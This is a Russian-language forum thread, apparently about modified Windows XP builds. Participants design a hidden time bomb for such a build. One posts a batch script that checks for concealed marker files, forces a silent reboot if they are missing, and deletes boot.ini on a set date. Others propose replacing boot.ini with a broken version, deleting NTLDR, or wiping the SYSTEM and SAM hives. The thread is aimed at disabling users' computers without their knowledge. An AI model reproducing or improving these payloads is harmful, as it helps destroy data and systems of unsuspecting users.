[Wowa_z]

Цитата Alexej77:

Реализация: библиотека winntbbu.dll патчится специальным образом, чтобы при своей загрузке она подгружала дополнительную библиотеку (с именем, например, bitsprx1.dll для маскировки под остальные похожие файлы), в которой содержится диалог ввода и проверка пароля. »

А как можно пропатчить другие winntbbu.dll для того чтобы срабатывала эта защита?

[Alexej77]

Wowa_z, сам не пропатчишь. Возьми здесь тот, что я выкладывал.

А что, если сделать так:
1. Кидаем в %windir%\system32\dllcache какое-нибудь чек-файло (почему в dllcache - потому что юзверь папочку не видет, следовательно, обнаружить будет трудняцко, даже если батник вскроет)
2. Читаем это файло, если все файлики (а чеков у нас будет как минимум три) на месте, идём дальше, если чего-то не хватает, идём в ребут. Тихий ребут можно сделать тем же XPTweaker'ом.
3. Если всё файлы на месте делаем следующее: задаём дату Х, по достижении которой система подыхает:

читать дальше »

Код:

cls
@echo off
set file=%windir%\system32\dllcache\explorer.exe.mui.txt
set file2=%windir%\system32\dllcache\shell32.dll.mui.txt
set file3=%windir%\system32\dllcache\rundll32.exe.mui.txt
if exist %file% goto next1
if not exist %file% goto error
:next1
if exist %file2% goto next2
if not exist %file2% goto error
:next2
if exist %file3% goto checkdate
if not exist %file3% goto error
:error
set reboot="%programfiles%\XP Tweaker"
cd %reboot%
start xptweaker.exe /reboot /force
exit
:checkdate
set D=22.08.2008
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:\boot.ini set lv=%%i:
if defined lv (
if %D%==%DATE% (
	attrib -A -S -R -H %lv%\boot.ini
	del %lv%\boot.ini
) else (
	exit
	)
)

Что я хотел этим сделать - проверяем три файа, если всё окей, идём к чекдэйт. Если заданная дата Х соответствует текущей дате, удалить бут-ини, из-за чего (сначала я думал), система грузится перестанет. Хрена с два! Грузится как ни в чём не бывало! Соответственно вопрос: что можно удалить, чтобы система перестала грузится (чтобы всю папку WINDOWS не дэлетить.

Сейчас только пришла мысля - может быть проверять реестр на наличие каких-нибудь строковых параметров, к примеру?

Что, ни у кого никаких идей не осталось??

[DiMMMm]

D_Master, можно подменять boot.ini на "исправленный" вариант, в котором, например, изменить название папки с Windows. Вот так:

Код:

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(2)partition(1)\WINDWS
[operating systems]
multi(0)disk(0)rdisk(2)partition(1)\WINDWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

главное изменить названия папки в обоих местах (default и user-defined варианты)

чорд...
как же это до мну сразу не дошло...
Только скоре всего не подменять, а редактировать, откуда мы знаем, скока осей у чела на тачке стоит...
заодно и от других виндов его избавим)))

[AleksandrG]

Чтоб не загружалась именно эта ось или весь компьютер?
Если весь, то удали NTLDR и все.
Хотя и boot.ini и NTLDR достаточно легко лечаться

AleksandrG, лечатся в смысле тупо "копи-паст"? System и Sam думаю удалить будет нереально, да?

[DiMMMm]

D_Master, можно из-под загруженной системы экстримально "почистить" их

DiMMMm, можно поподробнее?